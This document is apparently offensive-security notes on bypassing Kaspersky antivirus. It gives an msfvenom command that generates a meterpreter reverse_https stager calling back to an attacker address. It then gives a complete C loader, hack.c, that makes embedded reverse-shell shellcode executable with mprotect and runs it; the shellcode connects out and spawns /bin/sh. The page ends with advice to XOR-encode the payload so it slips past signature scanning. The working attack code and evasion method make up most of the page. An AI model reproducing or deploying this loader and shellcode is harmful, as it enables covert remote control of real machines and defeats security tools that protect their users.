AV Bypass

Bypass Kaspersky

Generate the payload as a C byte array with msfvenom (`-f c` emits an `unsigned char buf[] = "..."` literal that is pasted over `buf` in hack.c). Note the mismatch below: the command produces a `linux/x64/meterpreter/reverse_https` stager for 192.168.119.120:443, whereas the bytes actually pasted into hack.c are a plain `linux/x64/shell_reverse_tcp` stub that connects back to 127.0.0.1:443 — regenerate with the payload, LHOST and LPORT you really intend before building.
msfvenom -p linux/x64/meterpreter/reverse_https lhost=192.168.119.120 lport=443 -f c
hack.c
#define _GNU_SOURCE
#include <stdint.h>   // uintptr_t
#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>
#include <sys/mman.h> // for mprotect
#include <unistd.h>

/*
 * Raw x86-64 Linux shellcode; main() flips its page(s) to RX and jumps here.
 *
 * These bytes are a linux/x64/shell_reverse_tcp stub, NOT the
 * meterpreter/reverse_https stager the msfvenom command in the notes
 * generates. Decoded from the bytes themselves:
 *   - socket(AF_INET, SOCK_STREAM, 0)
 *   - connect() to the sockaddr_in embedded at offset 16:
 *     family 0x0002, port 0x01bb (443, network order), address 127.0.0.1
 *   - dup2(sock, fd) for fd = 2, 1, 0
 *   - execve("/bin/sh", ["/bin/sh", NULL], NULL)
 * Regenerate with the intended payload/LHOST/LPORT before use.
 *
 * The array is deliberately non-const so it lands in writable .data rather
 * than .rodata; main() relies on being able to mprotect() that page. The
 * trailing 0x00 reproduces the NUL the string-literal form carried, so
 * sizeof buf is unchanged (75).
 */
unsigned char buf[] = {
        /* socket(AF_INET, SOCK_STREAM, 0); xchg rax,rdi keeps the fd in rdi */
        0x6a, 0x29, 0x58, 0x99, 0x6a, 0x02, 0x5f, 0x6a, 0x01, 0x5e, 0x0f, 0x05,
        0x48, 0x97,
        /* mov rcx, sockaddr_in{AF_INET, 443, 127.0.0.1}; push; connect() */
        0x48, 0xb9, 0x02, 0x00, 0x01, 0xbb, 0x7f, 0x00, 0x00, 0x01, 0x51, 0x48,
        0x89, 0xe6, 0x6a, 0x10, 0x5a, 0x6a, 0x2a, 0x58, 0x0f, 0x05,
        /* rsi = 3; do { rsi--; dup2(sock, rsi); } while (rsi != 0) */
        0x6a, 0x03, 0x5e, 0x48, 0xff, 0xce, 0x6a, 0x21, 0x58, 0x0f, 0x05, 0x75,
        0xf6,
        /* execve("/bin/sh", ["/bin/sh", NULL], NULL) */
        0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
        0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6, 0x0f,
        0x05,
        /* terminator carried over from the string-literal form */
        0x00,
};

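/*
 * Make the memory holding `buf` executable and transfer control to it.
 *
 * `buf` is a writable global, so its page is mapped RW but not executable
 * (NX). mprotect() requires a page-aligned start, so the address is rounded
 * down to the page boundary; the length is then computed so the whole buffer
 * is covered. The original passed a single page, which faults on the tail of
 * a buffer that happens to straddle a page boundary.
 *
 * Returns EXIT_FAILURE if the page size cannot be read or mprotect() fails.
 * Does not return normally once the payload runs: the embedded shellcode ends
 * in execve("/bin/sh").
 *
 * NOTE(review): flipping a .data page to RX from user code is itself a
 * behavioural indicator some endpoint agents hook; this only addresses the
 * static-signature side.
 */
int main(int argc, char **argv)
{
        (void)argc;
        (void)argv;

        long pagesize = sysconf(_SC_PAGESIZE);
        if (pagesize <= 0) {
                /* -1 would otherwise turn the alignment mask into garbage */
                perror("sysconf");
                return EXIT_FAILURE;
        }

        /* Page-align the start; mprotect() rejects unaligned addresses. */
        uintptr_t start = (uintptr_t)buf & ~((uintptr_t)pagesize - 1);
        uintptr_t end = (uintptr_t)buf + sizeof buf;
        size_t len = (size_t)(end - start);

        /*
         * RX only, no WRITE (W^X). Everything else sharing these pages loses
         * write access too, so any decoding of the payload must happen before
         * this call.
         */
        if (mprotect((void *)start, len, PROT_READ | PROT_EXEC) != 0) {
                perror("mprotect");
                return EXIT_FAILURE;
        }

        /*
         * Data-to-function pointer cast is not portable C but is the usual
         * way to run position-independent shellcode on Linux.
         */
        void (*payload)(void) = (void (*)(void))buf;
        payload();

        return EXIT_SUCCESS;
}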

If compiling on Kali, make sure the build matches the target: the shellcode above is x86-64 Linux, so it must be built as a 64-bit Linux binary (e.g. `gcc hack.c -o hack`; add `-static` if the target's glibc may differ) and the payload bytes themselves must be generated for the target's architecture. Because the wrapper uses mprotect() at runtime, no `-z execstack` linker flag is needed.

XOR encoder: XOR-ing the raw shellcode with a key before embedding it removes the byte patterns that signature-based AV scanning matches on disk. This only defeats static signature matching — once the wrapper decodes the bytes in memory, the original payload is visible to in-memory scanning, and the behaviour (connect-back, execve of /bin/sh) is unchanged.

Update the shellcode wrapper to decode the buffer in place before calling mprotect(): the page is still writable at that point, whereas after it has been changed to PROT_READ|PROT_EXEC any write to `buf` faults.
